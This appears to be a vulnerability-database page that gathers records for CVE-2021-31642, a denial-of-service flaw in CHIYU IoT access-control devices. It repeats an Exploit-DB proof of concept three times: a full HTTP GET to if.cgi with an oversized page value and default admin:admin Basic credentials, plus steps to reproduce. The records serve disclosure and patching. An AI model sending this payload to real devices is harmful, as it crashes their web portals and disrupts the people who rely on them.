CHIYU IoT Devices - Denial of Service Vulnerability

2021-06-03T00:00:00

Description

{"id": "1337DAY-ID-36339", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "CHIYU IoT Devices - Denial of Service Vulnerability", "description": "", "published": "2021-06-03T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 6.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "href": "https://0day.today/exploit/description/36339", "reporter": "sirpedrotavares", "references": [], "cvelist": ["CVE-2021-31642"], "immutableFields": [], "lastseen": "2021-12-04T15:55:15", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-31642"]}, {"type": "exploitdb", "idList": ["EDB-ID:49937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162934"]}], "rev": 4}, "score": {"value": 6.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-31642"]}, {"type": "exploitdb", "idList": ["EDB-ID:49937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162934"]}]}, "exploitation": null, "vulnersScore": 6.6}, "sourceHref": "https://0day.today/exploit/36339", "sourceData": "# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)\n# Exploit Author: sirpedrotavares\n# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html\n# Software Link: https://www.chiyu-tech.com/category-hardware.html\n# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021\n# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC\n# CVE: CVE-2021-31642\n# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks\n\nDescription: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.\nCVE ID: CVE-2021-31642\nCVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\nURL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642\n\nAffected parameter: page=Component: if.cgi\nPayload:\nif.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000\n\n====HTTP request======\nGET\n/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000\nHTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)\nGecko/20100101 Firefox/87.0\nAccept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3\nAccept-Encoding: gzip, deflate\nAuthorization: Basic YWRtaW46YWRtaW4=\nConnection: close\nReferer: http://127.0.0.1/AccLog.htm\nCookie: fresh=\nUpgrade-Insecure-Requests: 1\n\n\n\nSteps to reproduce:\n 1. Navigate to the vulnerable device\n 2. Make a GET request to the CGI component (if.cgi)\n 3. Append the payload at the end of the vulnerable parameter (page)\n 4. Submit the request and observe payload execution\n\n\n Mitigation: The latest version of the CHIYU firmware should be installed\nto mitigate this vulnerability.\n", "category": "dos / poc", "verified": true, "_state": {"dependencies": 1646316633}}

{"cve": [{"lastseen": "2022-03-23T18:07:09", "description": "A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-01T15:15:00", "type": "cve", "title": "CVE-2021-31642", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.8, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31642"], "modified": "2021-06-08T19:09:00", "cpe": ["cpe:/o:chiyu-tech:webpass_firmware:-", "cpe:/o:chiyu-tech:semac_d4_firmware:-", "cpe:/o:chiyu-tech:semac_d2_n300_firmware:-", "cpe:/o:chiyu-tech:biosense_firmware:-", "cpe:/o:chiyu-tech:semac_s3v3_firmware:-", "cpe:/o:chiyu-tech:semac_s2_firmware:-", "cpe:/o:chiyu-tech:semac_d2_firmware:-", "cpe:/o:chiyu-tech:semac_d1_firmware:-", "cpe:/o:chiyu-tech:bf-631_firmware:-", "cpe:/o:chiyu-tech:bf-630_firmware:-", "cpe:/o:chiyu-tech:semac_s1_osdp_firmware:-"], "id": "CVE-2021-31642", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31642", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:chiyu-tech:webpass_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:chiyu-tech:semac_d1_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:chiyu-tech:bf-630_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:chiyu-tech:semac_d4_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:chiyu-tech:biosense_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:chiyu-tech:semac_s3v3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:chiyu-tech:semac_d2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:chiyu-tech:semac_d2_n300_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:chiyu-tech:semac_s2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:chiyu-tech:semac_s1_osdp_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:chiyu-tech:bf-631_firmware:-:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2021-06-03T15:20:47", "description": "", "cvss3": {}, "published": "2021-06-03T00:00:00", "type": "packetstorm", "title": "CHIYU IoT Denial Of Service", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-31642"], "modified": "2021-06-03T00:00:00", "id": "PACKETSTORM:162934", "href": "https://packetstormsecurity.com/files/162934/CHIYU-IoT-Denial-Of-Service.html", "sourceData": "`# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS) \n# Date: 01/06/2021 \n# Exploit Author: sirpedrotavares \n# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html \n# Software Link: https://www.chiyu-tech.com/category-hardware.html \n# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021 \n# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC \n# CVE: CVE-2021-31642 \n# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks \n \nDescription: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device. \nCVE ID: CVE-2021-31642 \nCVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H \nURL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642 \n \nAffected parameter: page=Component: if.cgi \nPayload: \nif.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 \n \n====HTTP request====== \nGET \n/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 \nHTTP/1.1 \nHost: 127.0.0.1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) \nGecko/20100101 Firefox/87.0 \nAccept: \ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nAccept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 \nAccept-Encoding: gzip, deflate \nAuthorization: Basic YWRtaW46YWRtaW4= \nConnection: close \nReferer: http://127.0.0.1/AccLog.htm \nCookie: fresh= \nUpgrade-Insecure-Requests: 1 \n \n \n \nSteps to reproduce: \n1. Navigate to the vulnerable device \n2. Make a GET request to the CGI component (if.cgi) \n3. Append the payload at the end of the vulnerable parameter (page) \n4. Submit the request and observe payload execution \n \n \nMitigation: The latest version of the CHIYU firmware should be installed \nto mitigate this vulnerability. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162934/chiyuiot-dos.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-05-13T17:37:41", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-03T00:00:00", "type": "exploitdb", "title": "CHIYU IoT Devices - Denial of Service (DoS)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.8, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-31642", "CVE-2021-31642"], "modified": "2021-06-03T00:00:00", "id": "EDB-ID:49937", "href": "https://www.exploit-db.com/exploits/49937", "sourceData": "# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)\r\n# Date: 01/06/2021\r\n# Exploit Author: sirpedrotavares\r\n# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html\r\n# Software Link: https://www.chiyu-tech.com/category-hardware.html\r\n# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021\r\n# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC\r\n# CVE: CVE-2021-31642\r\n# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks\r\n\r\nDescription: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.\r\nCVE ID: CVE-2021-31642\r\nCVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\r\nURL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642\r\n\r\nAffected parameter: page=Component: if.cgi\r\nPayload:\r\nif.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000\r\n\r\n====HTTP request======\r\nGET\r\n/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000\r\nHTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)\r\nGecko/20100101 Firefox/87.0\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nConnection: close\r\nReferer: http://127.0.0.1/AccLog.htm\r\nCookie: fresh=\r\nUpgrade-Insecure-Requests: 1\r\n\r\n\r\n\r\nSteps to reproduce:\r\n 1. Navigate to the vulnerable device\r\n 2. Make a GET request to the CGI component (if.cgi)\r\n 3. Append the payload at the end of the vulnerable parameter (page)\r\n 4. Submit the request and observe payload execution\r\n\r\n\r\n Mitigation: The latest version of the CHIYU firmware should be installed\r\nto mitigate this vulnerability.", "sourceHref": "https://www.exploit-db.com/download/49937", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}}]}

CHIYU IoT Devices - Denial of Service Vulnerability

Description

Related